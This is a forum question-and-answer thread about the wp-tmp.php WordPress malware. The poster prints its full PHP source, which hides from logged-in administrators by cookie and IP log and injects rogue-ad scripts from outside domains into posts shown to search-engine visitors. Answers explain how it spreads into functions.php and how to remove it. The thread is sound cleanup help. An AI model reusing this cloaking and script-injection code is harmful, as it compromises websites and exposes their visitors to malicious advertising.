# What can do Virus wp-tmp.php on WordPress

Tags: javascript, php, wordpress

I found this virus on My WordPress on wp-includes/ Files that has scan by siteguarding.com and other and found bad scripts ad

## this content file "wp-tmp.php" :

```html
ini_set('display_errors', 0);
error_reporting(0);
$anx='a107e0b262722f0cea3f7ce097597b7c';
if ( ! function_exists( 'slider_option' ) ) {  


function slider_option($content){ 
if(is_single())
{




$con = '
';

$con2 = '

<script type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1412000"></script>

<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1412002&interactive=1&pushup=1"></script>

';

$content=$content.$con2;
}
return $content;
} 

function slider_option_footer(){ 
if(!is_single())
{




$con2 = '

<script type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1412000"></script>

<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1412002&interactive=1&pushup=1"></script>

';

echo $con2;
}
} 








function setting_my_first_cookie() {
  setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
  }


if(is_user_logged_in())
{
add_action( 'init', 'setting_my_first_cookie',1 );
}







if( current_user_can('edit_others_pages'))
{

if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
{
$ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
}

if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
{
$ip.=$_SERVER['REMOTE_ADDR'].'
';
@file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip);


}



}






$ref = $_SERVER['HTTP_REFERER'];
$SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
foreach ($SE as $source) {
  if (strpos($ref,$source)!==false) {
    setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN); 
 $sevisitor=true;
  }
}






if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in()) 
{
$adtxt=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false)
{
if($sevisitor==true || isset($_COOKIE['sevisitor']))
{
add_filter('the_content','slider_option');
add_action('wp_footer','slider_option_footer');
}

}

} 





}
```

What was this file doing?
And how is know that file is insert on my website file root ?
I have chating with siteguarding.com support and tell me "Your website is hacked"
wp-includes/wp-tmp.php - 100% virus
up/includes/functions.php - 100% virus
you are in blacklist

Comment: Detected problems

Malware found in the URL: http://sudan4tech.com/404javascript.js [rogueads.unwanted_ads?1]
<script type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1412000"></script>

Comment: Malware found in the URL: http://sudan4tech.com/category/%d9%83%d8%aa%d8%a7%d8%a8%d8%a7%d8%aa-%d8%a7%d8%ae%d8%b1%d9%89-%d9%88%d9%85%d9%86%d9%88%d8%b9%d8%a7%d8%aa-%d8%a7%d9%81%d9%83%d8%a7%d8%b1/ [rogueads.unwanted_ads?1]
<script type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1412000"></script>

Comment: Malware found in the URL: http://sudan4tech.com/privacy-policy/ [rogueads.unwanted_ads?1]
<script type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1412000"></script>

Comment: Malware found in the URL (for Google's UA): http://sudan4tech.com [rogueads.unwanted_ads?1]
<script type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1412000"></script>

Comment: You may be used nulled or free themes and plugins. These files contain some pho script to show disgusting redirecting ads. I found the full details on how to solve this problem here https://www.wikilogy.com/wordpress-wp-vcd-php-wp-tmp-php-wp-feed-php-removal/
I hope that everything who have faced this problem can solve easily.

Answer (score 0, accepted):

It's malware, definitely this file is not part WP. Remove the file, edit your folder permisions, search your files for other malicious code. Update WP and your plugins.

Answer (score 1):

this file uses your IO, and some time causes 404, 500 and database connection issues.

this file uses your themes funtions.php to inject the code ( malware ).

the code injected by this file starts from line 1 of the functions.php and ends with some comments like // themes tmp.

the solution is that first delete **wp-tmp.php** and **wp-vcd.php** from **/wp-includes**, and also remove the code from functions.php and set functions.php permissions to **0555** or **0444** for both parent and child theme. so that this malware cannot write to the functions.php